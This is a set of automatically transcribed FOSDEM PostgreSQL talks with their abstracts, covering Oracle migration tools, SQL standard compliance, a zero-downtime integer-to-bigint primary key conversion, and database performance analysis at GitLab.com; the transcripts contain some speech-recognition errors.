migration tool. It's a Perl script, not totally bug free, but much used, time-dested, proven. It's a decent solution. It generates a DDL script that you have to modify if you need. It exports and imports data for you. It takes time, but usable. It does some attempt at translating PLS scale, but that's more search replace and pretty limited. There's my personal tool, my baby, AuraMigrator. I implemented it to use the Oracle foreign data wrapper. It uses the foreign data wrapper to migrate data and metadata to. The nice thing about this is that it directly moves the data from the Oracle database to the Postgres database, so there's no export input. It's faster. You can parallelize it to some extent, not perfect. The big drawback is that you have to install the Oracle foreign data wrapper in the target database. If you want to migrate to a hosted database, that's usually not an option, so AuraMigrator would be out in that case. It makes no attempt to migrate PLS scale or SQL only very little. I added a very simple replication solution for low downtime migrations. It's pretty crude. It uses triggers on all Oracle tables, which is often not something you can afford. Finally, there is our cybertech migrator. That's now a closed source tool. It's commercial. It has a nice, good rhythm migration, makes it easy. It's highly parallelizable. It has PLS scale conversion that's not just search and replace, but much smarter. Nothing's perfect, of course. We are currently developing change data capture for close to zero downtime migration. Check it out. Maybe it's the tool for you. Okay, that's all. I'm taking questions now. Thank you for your attention.
I'll walk you through all the problems and difficulties that can occur when you migrate an Oracle database to PostgreSQL, from the conceptual phase and general architectural differences to the specific problems that you are likely to encounter. I'll suggest solutions or promising ways to tackle these problems and give you a brief overview over some of the existing tools that facilitate Oracle migration.
10.5446/53265 (DOI)
Good afternoon. My name is Simon Riggs and I'm a Postgres fellow with EnterpriseDB or ADB. I'm going to be talking to you today about PostgresQL and the SQL standard and this is a 25 minute presentation. So Postgres is the world's most advanced open source database and one of the reasons why it's the most advanced database is that Postgres has got very good adherence to the SQL standard which has been very beneficial in showing us the way for databases to develop and we've done our best to implement the full standards to the full extent of the standard across many years. So what exactly is the SQL standard? Well probably the best way to explain it is actually just simply to show you a copy of the standard. This is a document that's 1691 pages long and it has things within it that express the syntax of the language that we're looking at and here you can see that the table definition consists of create table and then there's scoping, sub-causes and other types of information and these are all provided in exact detail so that we know exactly what the standard is and what it is not. So that's the syntax but then also within the standard we have various syntax rules that explain what each part of the syntax means and what types of things it needs to contain. So actually it's extremely well laid out and it's fairly clear what we need to do. It is very detailed however and it does require some experience to be able to read properly but even so it's extremely clear as to what we should be doing. So if I go back to the main presentation now. So the SQL standard is published by the International Standards Organization or ISO and it's also co-published by the International Electro-Technical Commission which is a rather grand title but that's why it gets the title ISO slash IEC and then it gets a number because all of the different standards have got a number so the SQL standard is 9075 so it's ISO IEC 9075. Now this was originally published in 1992 and it's updated regularly not on a particular cadence but you'll see that versions arrived roughly every three to five years over that time period. Now each new publication supersedes the previous one or in other words it's a bit of a moving target but most of the time the changes are simply additions of new structure or new keywords so it's not that difficult for us to track. So the latest version of the SQL standard is being voted on now and actually the deadline is in February 2021 so unfortunately we haven't got a lot of time to discuss the forthcoming changes in order to influence the vote but it's good to know that the SQL standard is being advanced and there will be additional changes to it coming soon. Now you might also know that the standards are voted on a country level so in the US there's something called the ANSI committee or the American National Standards Institute committee and so sometimes you'll hear the SQL standard talked about as the ANSI standard but that's just the perspective of our US colleagues in other countries the committees called other things but all of these different bodies all feed into the international standards organization which is the main host for the SQL standard. Now the standard is actually spread across 16 different areas now the document that I showed you that was more than a thousand pages long was just simply the SQL foundation and so there's actually another 15 other documents that have got different parts of the standard in. Now I've highlighted here which parts we follow so for example the foreign data wrappers technologies all based around the management of external data or SQL med and then you'll see that the information schema is based around the SQL schemata and our XML compliance is basically comes directly from the standard and here you'll see there's a new one emerging called the SQL property graph and I'll talk a little bit more about that in a minute but the compliance for PostgreSQL is shown very clearly in the documentation and that allows you to see which things we support and which things we don't. Now obviously 25 minutes not long enough really to go into a lengthy discussion of which things we support and which things we don't but in general I think we can pull out a few things just to say that there is this thing called the call level interface which we don't really support and persistent stored modules are in database functions or procedures written in a particular module we don't see all that either but quite a lot of the main aspects of SQL we completely and fully support but there's a couple of small deviations from the standard for example with triggers we execute them in alphabetical order whereas the standard specifies that they should be executed in the order in which they were created which leads to sort of non-deterministic behavior so it's easier to do it the way that we do it but there's very few examples like that most of the time we follow the exact standard completely to the letter as far as we can. So some of the things that I'd like to show to you here today are the key features of the SQL standard and you know I can discuss what point these things were adopted by PostgreSQL and at what time they were actually suggested as being part of the SQL standard. So in many cases PostgreSQL was actually ahead of the standard for example sequences were introduced into PostgreSQL in version 6.1 in 1997 but they didn't become part of the SQL standard until 2003 so it was six years ahead of the standard in that particular regard. The limit command was introduced into PostgreSQL 6.5 in 1999 and yet that didn't go into the SQL standard until 2008 so again nine years ahead of the standard at that point and with truncate that emerged in PostgreSQL 7.0 we were eight years ahead of the standard which is always good but I take that really not necessarily as a massive win for PostgreSQL so much as to say that it's nice to know that the SQL standard does actually follow the practical implementations that they see out there so in essence PostgreSQL was influencing the standard which is a very good thing. There are other parts of the SQL standard some of them are reasonably well known or others not and you can see window clauses came into the standard in 2003 but PostgreSQL didn't implement them until 2009. Now that's not simply because we didn't understand or we disagreed with the standard it just wasn't appropriate at that time to work on that feature so obviously as PostgreSQL was maturing as a product we needed to work on other things in different priority orders so that's why it took us a while to work on that one. Again with clauses and recursive queries these were also supported in PostgreSQL 8.4 and you can see there that was actually 10 years after these were added to the standard. Now you also see things like the XML clause was added in 2009 and you'll also see that we were very prompt at adding that and that's really because the functionality around that was really mostly just syntax so there wasn't much for us to do in order to get that to be supported. And then the last four that I'm going to talk about you'll see that the merge clause arrived in the standard in 2003 and there's a patch into PostgreSQL 14 to support that. There's also a patch for system temporal tables and that came into the standard in 2011. I actually marked that when I wrote this presentation as incomplete but actually one of the things I've done in the last week was to actually finish off the patch so it's pretty complete now so please ignore that incomplete bit. There's also things like procedural language which I said we don't support but of course we have had things like PLPGSQL in PostgreSQL since PostgreSQL 6 but we just didn't have SQL standard compliant languages in PostgreSQL but again we have a patch for that in PostgreSQL 14 and the same with JSON. Well the strange thing about JSON is again PostgreSQL has led the way there really in implementing JSON features in an SQL database and that's what led to the JSON features being standardised but what you do notice is that the standard is actually different from where we were with the PostgreSQL features so we've got a little bit of catch up to do there to make it exactly compliant. So what I'm going to do now is I'm going to just go through some of those features just so that you're familiar with the types of things that the SQL language contains because in my experience many people haven't actually seen some of these things close up or have them explained to them so if you'll excuse me I'm now going to go through one by one some of these quite interesting features about the SQL standard. So let's start with window functions. Now one of the things that you may have learnt when you first looked at SQL was the fact that the select statement retrieves rows from a table without regard to the ordering of the rows in the table and the only way that you can get a defined order out of an SQL select statement is by adding the order by clause. What window functions do is they introduce the concept of ordering between rows to allow you to calculate different types of query and in this particular case we can see a query that has an over clause here and what this does is it calculates the average over the last three hours and that's not the same thing as the last three rows. In fact there might only be one row in the last three hours or there might be 300 rows you don't know so the specification here is actually as a time range rather than as a fixed number of rows which is quite an interesting way of doing it all supported by the SQL standard and that allows us to calculate a moving average rather than just using the latest current value of the metric when we're looking at data. So this is quite important because it recognises the role and importance of time series within databases and obviously I'm sort of hinting towards an internet of things type application here we're using the words measurements and metrics. So this is quite important addition to the standard and this has been quite well optimised in PostgreSQL and allows you to access the data very efficiently so that's very cool. It does take a little bit more effort to write these type of queries but you know obviously if you don't know they exist then you're not going to write them at all so that's one of the things I'm trying to do here is explain to you what's actually possible. So moving on to the next one then is recursive queries and you'll note that some people have said that graph queries require their own special language and it's true you need a special formulation of a query in order to get it to work correctly with graph or hierarchical data but you don't need a different language other than SQL. SQL is actually fully sufficient in the SQL standard form as a way of executing graph queries and that's because the SQL standard supports this particular keyword recursive. So what this does is it starts with a starting condition where you define which nodes of a graph that you're going to start from and then this recursive term gets repeatedly applied to the graph until the query stops executing and it gives you a full result and what that allows you to do is it allows you to search through any level of complexity in a graph database and I won't explain some of these terms but that's related to making sure that the query doesn't infinitely recycle around the graph and things like that. So that shows that SQL supports graph queries and there are some additional terms being added to PostgreSQL in 14. We've got the search and the cycle clause which affects various options for how you search through data. Now very interestingly there's some standards work underway to bring graph query languages directly into SQL to make it slightly easier to write graph style queries. So the first of these is known as property graph and that is going to be added to the SQL standard possibly in 2021 but possibly in 2022 not quite sure but it is going to be called SQL slash PGQ and it's quite a structured way of defining graph queries and then beyond that there's also another initiative to bring graph query languages into SQL and there's a second initiative with a much more generalized form of graph query that we're involved with the work on to a certain extent. Anyway these are exciting times and what we're seeing is the SQL language growing and changing in response to the needs of users needing to look through different types of data. So again exciting times. Another statement that's of particular interest is something called the merge statement. What this allows you to do is it allows you to join the source data with the target data and based upon that join you can decide whether you're going to insert the rows or whether you're going to update. So if the join finds a match then you can do an update or delete and if it doesn't find a match then you can insert rows and you can also specify additional conditions such as insert when that condition is met. What this does is it turns SQL into quite a complex load utility. It allows you to process data in quite advanced ways and that is a very important capability for large data and particularly for analytics systems. But what we find with this statement is that it can load. Simon is experiencing some technical problems here so he wasn't able to join us for the QA session and also it looks like the video has been cut off a little bit which is a pity. Maybe we find an option to put the full length videos online somewhere else. But Simon is in chat as far as I can tell so he can answer questions there and also once the next video starts playing this room like the private room you could say for this talk will be open so Simon is here at least in chat so he will be answering questions there. Oh there he is he just came on. Hello Simon. I have no idea if you're large on the screen now but anyway so we had a couple of questions that you already answered in chat but for the people only watching this in the stream maybe we can go through them. So one of the questions was who is representing Postgres on the standards committee? Maybe you could. Yeah we're not fully represented on the standards committee in the way that we would like to be. My understanding is that's because there's some difficulty in the way that the standards body works. It's the voting is done at international level so all of the individual countries have their own committees. So a lot of the work that happens on the SQL standard happens within the US committee and for example myself and Peter Eisenhower don't have access to that committee because we're not US nationals. So it's a little bit confused in terms of the way that works so obviously you know we'd like multiple people to be involved there but obviously the standards process itself is quite involved it's almost a full-time occupation to be involved and frankly we don't have the manpower. I mean Peter's been doing a lot of it and I've been tracking some of that work for some some years now and there are some other people involved but you know obviously writing the features as well as tracking future proposed features is a lot of so we're doing what we can with the available resources which is not very much. Thanks. So then somebody mentioned ENUMs and why they are not in the SQL standard? Well you know let's be honest I think Oracle didn't invent them right is probably the answer to that but yeah I mean you know it might change in the future I mean I would say we have been successful in getting things like the concept of the limit clause it's not called the limit clause in the standard but you know it is the limit clause and Jason for example is a really big thing to sort of demonstrate how that can be implemented and it was Postgres' implementation that really drove everybody else to adopt it so you know that's a very big success but you know I think the situation is now is that as of the 13th of January this year open source databases are now more than 50% of the noise in the market about databases and so that will begin to change that's also why we're starting to take the involvement with the standard a lot more seriously because you know basically it's our standard not just somebody else's standard that's being implemented. Yeah knock on water. So then Stefan Keller asked how close is PG-14 implementation of jsonb paths to SQL property graph query PGQ? Yeah so that was a little bit confused which I think Stefan realised but so property graph query is a section of the standard relating to graph queries and what the SQL standards committee are trying is to simplify the way that graph queries are written. Now one of the things that people don't really want to admit to which is what I answered in the presentation was that you can already write graph queries using SQL. It's just that a lot of companies tell you that you can't which is a bit confusing and so as a result they're then trying to put some more keywords and some structure into SQL to make it clearer how to write a graph query so so that is a bit strange but we don't think there's an awful lot of work to do to make that happen. Now let me differentiate between following the standard and fully optimising all graph queries are like separate things right but the actual standard should be fairly clear when it when it arrives in full and we will be able to implement that directly. Now so all of that's completely separate from json right it's just a separate branch of the standard okay and so we're pursuing those on parallel tracks. Oleg and his team at Postgres Pro are doing a lot of work on the standard but that is also supported by other people that are reviewing and committing the work that's being done so yes so parallel tracks is the best way to describe that. Yeah I know what you mean I mean it still feels a little strange to recommend people writing fetch first 10 rows only instead of limit 10 so the verbosity in the SQL standard is often impressive so then we have a question why does Oracle have such an impact on the standards? Well I mean historically I mean the level of resources that commercial companies can apply to software development is significantly different right I mean that's not an argument against open source it's just a recognition right so Oracle has been a you know a billion dollar company and they can afford whole teams of people to allocate to track in the standard and you know historically we've not been able to do that so you know and obviously with the whole market being more interested in commercial databases historically clearly you know the in former times the impact from commercial databases was greater but I mean what I'm saying is that with the rise of influence of open source databases we will see a corresponding change in the level of influence that we have on the standard and that's why that's why I'm doing a talk on the SQL standard here and that's why we're doing more work because our influence will grow and as long as we take it seriously obviously if we go well of course dudes we just ignore everybody else right then that's a really bad thing to say I mean my view is you know we're open source people we're implementing things directly into core PostgreSQL but that also means that we want to work with the other communities that are involved in standardizing things you know I mentioned them in the talk you know the the Unicode standard the IETF change requests that are coming through and the SQL standard and various things like that we need to
PostgreSQL follows the SQL Standard. What's that mean? Why do we care? Covers the history of the SQL Standard, the complex and interesting bits and how it is implemented in PostgreSQL, plus current in-progress patches and details for PG14.
10.5446/53267 (DOI)
Hello, virtual FOSDEM. My name is Jimmy Angelacos and I work as a senior Postgres architect at EDB. And today we're going to talk about changing your huge tables, data types and production. What is the motivation for this talk? First of all, we appear to be still in the era of big data, whatever that means, which means that along with everything else, Postgres has been seeing more heavy use with bigger tables and bigger data sets. Also Postgres performance has allowed this because it keeps getting better by the day. So you may find yourself in a situation where your database is facing rapid growth and you need to find a way to deal with that. So perhaps your growth is too rapid and you need to mitigate some decisions that you've taken early on. So why would you want to change data types on your database tables, especially if they're in production? First of all, you may have an incorrect data type. So something which was not suitable for what you wanted, like you have set a limit for VARCAR, which is not enough for your purposes. So you want to change it to variable length text. Secondly, you may want to change a non-optimal data type that you entered in your table. So for example, an ID column that is text that takes up nine bytes for an integer column that stores this ID for only four bytes, which will help your table scale better. Also, you may come across the situation of running out of IDs. If you have an integer ID column, the maximum limit is 2.1 billion, a little bit over that. So you may come across the situation of ID exhaustion. And in that case, what do you do? How do you keep your application running? Of course, you know that you can change types. You can change types only if they are compatible, though. So what you need is for data types that you, for the old data type to be binary-corrosable to the new type. So for example, XML can be converted to text very easily without any conversion function needed to be invoked. However, text to XML conversion requires a function to be run. So they are not binary-corrosable in that direction. And you can also have binary compatible columns and data types that have exactly the same internal representation in Postgres, such as text and VARCAR. So the way you do it is you have the alter table, alter type statement. It's a dvl command that lets you alter table, alter the column name to type the data type you want. You may also need to use the using expression if there is no implicit cast between the first and the second type, which needs that you may have to drop the default value for that column, run the alter table statement, and then add another default for the new data type. And this requires indexes to be rebuilt, even if the table doesn't have to get rewritten. So what is the problem here exactly? Alter table, alter column requires an access exclusive lock in order to change types. So that means that nothing can take place on that table. No reads and no writes are allowed to any other transaction. And this effectively stops us from using the table in production, which is a bad thing. Moreover, if the old data type and the new data type are not binary courseable between them, then you will have to rewrite the entire table, which is of course slow and requires double the disk space. So let us look at one possible scenario that you may encounter. Let's say that you have a huge table in production that is 1.7 billion rows. And you have a primary key, which is integer. So because of rapid growth, your table that is now 1.7 billion rows can become 2.1 billion rows very soon. So you find that big integer, which doesn't have the 2.1 billion limit, but is much larger, can be the solution for your problem. However, integer and big int are not binary compatible, because big int is eight bytes and integer is four bytes. So you have to rewrite the table. So how do you avoid having to lock the table in production and take everything down? So if you cannot take a maintenance window in order to perform this lengthy operation, then you need a concurrent solution. And let's look at one possible concurrent solution that can work. So first off, we add a new big int column to the table. Then we write a procedure that copies values from the old primary key column to the new big int column. And we do it in batches so that we don't affect the performance of the system too much. At the same time, we need to keep using the table and keep being able to write to the table. So we need to write a trigger that replicates the changes from the old column, which your application is aware of, to the new column that is practically invisible to your application. After we have treated the entire table and we have copied everything from the old column into the new big int column, we can drop the old column and rename the new one to the name of the old column. And then we make it the primary key. So let's look at a few details on what exactly needs to take place here. One detail is that we need to create a sequence for the new primary key. We also need to create the new primary key index. And after the conversion, we had best perform all of the DDL that does the column dropping and renaming in one transaction in order to be safe. And also keeping it in one transaction, Postgres tries to execute it as fast as possible. So we will encounter the minimum possible locking and or blocking of other operations by other users of our database. So the test system that was used to test this procedure was a laptop basically. And we created a table with 1.7 billion rows of 170 bytes each. So let's see how we create this example data. We create a table called large table with an integer column and a text content column. We create the table and we insert into the table our Lorem Ipsum to populate the content column. And then we generate series from 1 to 1.7 billion as we want 1.7 billion rows in the table. The insert takes quite a bit of time. It takes 32 minutes to generate this. It's not too bad because we haven't created any indexes yet. So we create a sequence for our large table ID column starting at the very next number after 1.7 billion. We set the default for the ID column to be this sequence. And then we create the index for the primary key. This takes 26 minutes on the test rig. So make of that what you will. And then we need to add this unique index as the primary key constraints to the table. So alter table, large table. We add the primary key using the index we have just created. And that takes a very short time. So let's say that now our data is in production and our table looks like this. It has a primary key and a sequence and an integer ID column. And we find that the size of our table is 265 gigs. So not small by any means. And the content of our table now looks like this. There is an ID from 1 to 1.7 billion and some content. If we select the number of live tuples we can see from pgstatusertables. For a large table we have 1.7 billion rows. First step is to add the new column. And if we make sure that the new column has a default of 0 then that can be an instantaneous operation because it is non-volatile. So alter table, large table, add column ID underscore new. Big integer is what we want this time around. We want the column to be not null and we set a default of 0. And that takes a very short time like 13 milliseconds. Next we need to build the trigger function to replicate the changes that are coming into our table while our conversion script is running. That copies everything from the old ID column to the new ID column. So we create the function large table trigger function returns trigger. And the only thing it does is when the value changes in the table we make sure that ID new takes the value of ID. So we create the function and then we need to add the trigger to the table that runs this function. So create trigger large table trigger. Before insert or update on large table because we want to replicate the changes the new column for each row execute the function large table trigger function. So now anything that changes in our table while we're running the conversion procedure is going to affect the new column as well. The conversion procedure, I'm sorry if the text is a bit cramped but we'll look at it in detail. We define a cursor for select ID from large table because we want to examine every single ID of that table. We define a batch size so we're going to do it in batches of 100,000 rows at a time. So we begin a loop of updating our large table and setting ID new equals ID for each one of the rows that we've selected. We increment our counter to determine where we are in the batch and every 100,000 rows so count modulo batch size equals 0 then we commit. So we don't commit with every row we commit with every 100,000 rows for performance reasons. That ends the loop and after we're done we commit and the procedure is over. Now what is important here is that we weren't able to do this with functions so we are taking advantage of the fact that procedures in Postgres offer us transactional control and we can do things such as begin transactions, commit them at will, rollback and so on. So what if we want this huge task to give us some progress indicator so we can add in the loop if count modulo batch size multiplied by 10 then raise notice rows done. So it will tell us every million rows 10 times our batch of 100,000 that the number of rows that have already been processed by the script. So now it's time to do it. We call the large table sync procedure and we see that it's processing 1 million rows, 2 million rows, 3 million rows and so on. Now to check that our procedure isn't actually blocking anything and users are not prevented from using the table let's select something from our large table, a random selection of one row and we use the backslash watch command in psql to run it every second. So every second we get an id from the table and another id the next second and so on. So we keep it running and we see that because it runs it means we're not blocking our users from reading from the table and also they're not prevented from writing to the table. So now we wait and seven hours later we see that our procedure has completed. It is done processing 1.7 billion rows and it took seven hours and six seconds on the test rig which is not too bad for something which is running concurrently and remember the purpose of this procedure is not to run fast, it is not to overpower your system and affect your performance so negatively while you're doing it that nobody else is able to use your table. So what does our table look like now? It has an id column, the content that it had and an id new column which is identical but is big integer instead of integer. Now we need to create the index for our primary key. So create unique index concurrently, we name it large table id new index on our large table and we created on the new id column that is big int. So index creation takes an hour and 17 minutes and now we haven't really made any changes to the table so it's the time to run the ddl all at once as we said so we're going to use an anonymous code block to execute all of it. So we need to find the new start for our sequence so we select the max id from large table into the variable new start then we create a sequence and we concatenate new start to the end of that statement that we then execute so create sequence large table with that number then we alter table to set the sequence to be the default for our column id new and then we drop the id column rename id new to id and then we add constraints the primary key using the index we just created in the last step we drop the trigger and we commit at the moment we commit all of the ddl is going to execute at the same time and it shouldn't block the table for very long at all and it shouldn't have any other negative consequences so we run it and we see alter table add constraint using index is a warning that postgres throws and says it will rename the index from large table id new index to large table id primary key which is fine and it does it and it only takes 451 milliseconds so less than half a second on our test rig and now we're all done we have changed our huge table uh primary key from integer to big integer without affecting the operation of our system so thank you very much and this is the background photo that was used uh you can find me on twitter and i am open to your questions now thanks very much for listening all right i assume that we are going to have the broadcast in any moment i just told you now to avoid this awkward silence and so we have a few questions thank you so much jimmy for this specific i work around so you came with this idea probably from a life uh existing issue right can you tell us whether there was something you just wanted to study or or this is a real problem that you faced yeah yeah it's a real life problem um people start using um primary keys with hint and it actually happens that sometimes they run out of integers because of the number of transactions or number of customers that they add in their database so it is a real world problem nice not not just a case study so good so a question coming from the audience is it advisable to change a value in a column while changing the data type so for instance changing text to a boolean and set all empty fields to false sorry i don't understand the idea is that you change the data type yeah but you also change the values when you're doing that all the same time oh you can do that well if you if you set your conversion function to change everything and also the trigger that deals with the incoming values then sure you can do that whether it's something that you want to do if you want a consistency in your application is a different story because as as we said this example is on running live database so maybe your application is not expecting the values to be changing right yeah and also because you're mentioning is a live database so there are new integers that are coming in the primary key there is a question or a comment about the the sequence of the big integer that you're creating when you're changing whether it is advisable or not just set it to a higher value so that you avoid any race conditions while doing the switch right yeah so in this case i just selected the max integer and because nobody was writing into my table in my laptop then it didn't change but yeah certainly it's a good idea to skip a few numbers ahead when you're creating the sequence good okay thanks for clarifying that there is another question here saying how big the table became after you updated all the rules um it grew but not to twice its size so it's a bit better than rewriting the entire table and also if you have auto vacuum running because you have multiple transactions then it's able to clean up a bit better than doing it in one huge transaction so any maintenance you have to do like after you do all this change because probably you would like to do a vacuum full but it's not possible of course and it's not kind of a advice you just run vacuum full in such a large table but yeah it's probably a good idea to analyze after you've changed your data type analyze okay yeah that's good for the statistics i also see a question about um uh declaring the cursor with hold you can't do that that's an sql thing if you declare the cursor um in plpg sql you don't need to save with hold right okay yes thanks for clarifying that one as well okay so i don't i don't see much questions uh at the moment but we already have a several ones so that's just being good anything else that you would like to add from the presentation that i say like okay i forgot to mention this that would have been valuable for the presentation um probably it doesn't uh what i would like to have done if i had the time is uh show a few more different data conversion so in this case we saw that it's just a one-for-one copy of an integer into a big end and it fits precisely um but possibly there are other use cases and if you're interested then perhaps i can have a follow-up or add a few slides in my presentation with different use cases okay excellent and uh more like a practical question because this was not your database when you said that this was inspired by a real-life case you needed to work together with let's say the customer that was running how how how what do you have to do as a dba to convince the developer of the project management in order to have this kind of maintenance uh window that you need to have for all this change well this didn't require maintenance window that's the whole point uh so it was the only acceptable solution in some cases uh so um when your management says that you cannot take the database offline because we'll be using money for example uh then it's the only thing you can do you can only go for some concurred solution yeah okay thanks for clarifying that that's the the value of this specific workaround so that's nice good um iila do you have anything else to add no thank you thank you jimmy for your talk it was really interesting um we have three more minutes for questions and then this live will interrupt so yeah if there are any questions ask them now or else we can continue this conversation in the room up to talk which will be available in three minutes thanks everyone thanks very much you me
You have a huge table, and it is necessary to change a column's data type, but your database has to keep running with no downtime. What do you do? Here's one way to perform this change, in as unobtrusive a manner as possible while your table keeps serving users, by avoiding long DDL table locks and leveraging procedural transaction control.
10.5446/53269 (DOI)
you Hello everyone, welcome to the talk about database performance at GitLab.com. I will present this talk with Nikolai. So let's go for the introductions. My name is Josec Correcinoto. I work in GitLab with the infrastructure team. I'm part of the team since September of 2018. And my background is in large organizations working with infrastructure, specialized in databases, performance, HA, etc. Nik, could you please present yourself? All right, thank you, Josec. My name is Nik, and I work with databases all my professional life. And I have a database related education. And I started with, many years ago, I started with commercial databases, but fortunately quickly switched to open source database system, Postgres, and no regrets since then. I also was briefly a hacker, and I participated in development of XML data type and functions. Also, I have a lot of various community activities, including Russian-speaking Postgres user group. And recently we launched Postgres TV in English. It's a YouTube B-weekly show. And also I participated in various conferences as a program committee member. A few years ago, I migrated to the US and relaunched my consulting practice, helping companies scale Postgres and improve performance. Thanks, Kola. I would like to introduce now the agenda for talk today. We'll talk a bit about GitLab, the company members and values from the company, architecture that we have there, and challenges that you are facing, some perform analysis that we're executing constantly lately, and some tools that are helping us in our day-to-day development by Postgres AI. Postgres Checkup, Jobbot, and Database Lab. Okay. First of all, what is GitLab? GitLab is a complete lifecycle tool for the DevOps that helps us to develop better softwares. So, GitLab has some special values from the company that I think is one of the main reasons that I joined them is, like, what are the values of the company? Starting for collaboration, we work asynchronous and remotely. We do not have offices all around the globe, but we keep cooperating with our colleagues using our tools and our methodology. Basically, iterating for, by issues or change requests or metric requests. Second, the results. In GitLab, we don't track hours, we track outcomes. Efficiency. We look always true for solutions that are straightforward. We don't want to reinvent the wheel or we're not looking for the most sophisticated solution. We want simple solutions. Diversity. We are based in 67 countries. So, we have people from different countries with different ideas that always supports for us different solutions, adding value to the trust. Iteration. In GitLab, we always like to work with the minimum viable changes. We don't want to create a big project and then try to integrate it. We prefer to do integration step by step. And the last value is transparency. Our company is 100% transparent. We have all our issues public and our roadmap, our strategy. And even when we have an outage, we have an instant issue. We have an issue that represents the incidents and we explain everything that happened. What are the measurements to fix? What are the plans for the future as a collective action to do this don't happen again? I think it's really interesting. So, now, I will talk a bit about the open source project. We have two versions of GitLab. One is the enterprise edition and the other is a community edition. In this case, here is the community edition. That is the open source project that has been used for more than 100,000 organizations and we have more than 3,000 code contributors. Some interesting fact here is like we release every day, 22 of the month, and we release with new features. I'm talking a bit about the enterprise edition and about how the company works. So, we support the lifecycle of the development completely and we are more than 1,297 employees located in 67 countries and having more than 30 million of registered users. Inside of this, we have some users that are GitLab.com, the part that we are working in the other part are the users that has the self-managed version that can be the enterprise or the customer or the community edition. Something interesting about GitLab is when the project started in 2011. In 2015, it was like getting some awards regarding the fastest growing company. Then we have the handbook. Something really interesting to mention that is our guidelines of how we work. In the handbook, we have how the teams work, what are our goals, and the methodology, roadmaps, etc. It's pretty flexible inside of GitLab that all of us can participate on it. This is the mission of GitLab that everyone can contribute. Inside of our teams and inside of our organizations, we can always open an MR to give a suggestion about how the things are being done or something that we think that could improve. Then we have a chat or a discussion that we try to always get the best outcome of it. This is what I want to say about the company. Now I would like to talk about the features. As you can see, we cover a lot of the full DevOps concept itself. We use internally a lot of the tool. We have the principle of dogfooding. With this, I can say that we use constantly CI-CD pipelines. For example, our backups are executing CI-CD pipelines every day to restore it and test it. It's a good example. Then we have new features that I would like to mention here, the monitoring. We have Rambooks as well. We can read the relations saying to the Rambook when we have an alert to trigger or say how will be the process that RSI we should follow and so on. Besides, we have all the parts of security in the protect area that you see here. If we look for the matrix of development of features, we see that every year we are developing more features. As you can see here, in the last years, we are growing and every year producing more and more features. Now let's talk about what is GitLab.com. We banished this version, this hostless version. It's a software services online.com. You can see that we have over 40 millions of Git pools operations. We have more than 6,000 Git requests per second. We have a lovely database there. That's what we take care of. That's a positive SQL version 11.6. It's a cluster of eight nodes, one primary and seven secondary. The primary has around 60 to 80,000 transactions per second in the peak times. The read-ons are around 20 to 30 in general. With that, what I was going to say is the architecture. The hardware architecture we have is N1 machines with 96 cores and 624 gigabytes of memory. Okay. I think this is, we use PgBouncer and we use Patronio. We'll explain this in the architecture and the following diagrams. Basically, what do we have here? We have poseless. In front of poseless, in case of the read-only nodes, we have PgBouncer. As you can see for the read-write, we have two clusters of PgBouncer. One for the synchronous traffic, not for the synchronous traffic. Let me explain this a bit more. The synchronous traffic is the traffic that comes from Web API. The other application that is asynchronous is what everything that comes from SideKicks that drops in general. The pools are different, configured for a better and optimized performance. From the other side, this over to redirect the traffic, we are using console names. We have two console names for the read-write traffic, as you can see here. One for a synchronous and the other for the synchronous. A different endpoint for this, that is the read-only traffic. The read-only traffic is redirected to all the nodes that are in the state of being read-only, secondaries. Patronio that we are using here is who controls, who is the primary and in case of an incident or a problem, he will do the fill-over or will remove from the cluster any of the read-only that are not operating properly. Console is a template for high availability imposters. In your case, when implementing this using, sorry, Patronio, is a high availability template that uses in your case, console as a DCS. It has distributed consensus storage, where we can keep the information of the status of the cluster the whole time. And here's how we have the diagram of this. Okay. Now we will talk about one problem that we are facing, things that we have faced at some times, is like when we have like a big degradation in performance or we start to see something suspicious, for example here. We see this is from the primary, and in some moments of the day, we are getting spikes of CPU utilization that are reaching over 85%. We would like to, we want to investigate this and understand what is happening there and see what are the root causes. We know that we have like constant deliveries and new releases, and the scenario is always changing. Since we have so many customers in one database, since we are monolith, we need to understand perfectly the functionality of every one of the components to optimize it and keep expanding. So expanding our capacity to resolve all the queries and statements that we are having at the moment. What we do here, we check the time where is the spike that we found out. Great. Now I need to explain a couple of things more. In GitLab, we use one station from extension from Prozres, PgStat statements, that basically collects data of all the statements, of the 5000 statements most executed in the database. Besides this, we use, we send this data by PgStat exporter to Prometheus, that additionally aggregates these insanus. And then we do an analysis in insanus directly or Prometheus, that will be the following. We check the following two concepts in PgStat statements. First here, I'm checking for the total time that the queries are taking to be resolved. So we are listing the 10 statements that are taking more time to be resolved. Here is the query, here is the linking that you have for Thanos to see the query itself, that I will share in the next screen. That is the following. As you can see, when that spike of production, you could see that some statements are taking more time to resolve. And you see that before and after the load was different, was more standard, was smooth. So we need to understand what's going on or why we have these calls here. Great. What do we do here? We check the next screen or the next option here that is in the console to see what are the queries. So I'm saying that this, as you can see, is what demanded more time during this peak. And here I have the queries. Having the queries, what I will do, I will go back to PgStat statements and check which are the queries. Here we list all the statements that are being executed. And then we have a great tool to talk with our developers to see what can we improve. One thing really interesting that we use in GitLab, as you can see at the end of SQL statements, we have a comment. We have a gem, since our applications are, most of our application is developed in Ruben Rails, we have a gem called the marginalia that adds a comment saying which method is triggering that query. That is how we can trace back the root cause of this statement. This is really useful for this iteration principle for the next one that we'll talk about in a few minutes. That's for the maximum number of calls. So having this information here, we try to talk with our developers to see if the plan can be improved or if we can check the frequency of the number of calls that we have. And with this, we start to create issues for each one of the queries and work with the teams looking for improvements and try to use more wisely the resources from the database. Great. The second method that we are executing here through evaluates, queries and database are the queries that are most called. The first one where the question took more time to resolve and now is the question that we are calling more times per second or per minute. So we are evaluating who are the heavy heaters on the database. Sometimes we have some queries that are really fast, but with to the scenario of degradation, they start to behave as low as all of them. But you can see here, as you will see that some statements can be executed two, three thousand times per second where being like a select start from table where primary key, we just look up by the primary key, the optimization is pretty small or like it's not possible. So what we proceed at that is to offer some caching. So having some structures of caching outside of the database can improve a lot of the performance. Of course, we have to have a mechanism to update this or to refresh or reload the caching case of updates. But still, we have seen big improvements on that. So here is the query in the improvement views. The graph, as you can see, you have a little deviation here on the number of queries per second. And here you see the statements. The case that I spoke or I mentioned a few minutes ago, this is the case number three and true. As you can see, like we are checking one table and just doing a look up by primary key. And these are good candidates to check or if we can reduce the frequency or if we can catch them. There's another work around that we are doing in improving the performance from the database. So now I would like to give the word to Nikolai to talk about the daily tools that we use, the POSELESS Checkup, Jobbot and Database Labs. Thank you, Jose. I'm about to share my screen. Okay. Do you see it? Yes. Cool. Okay. And let's do... I always forget how to do it present here. So let's 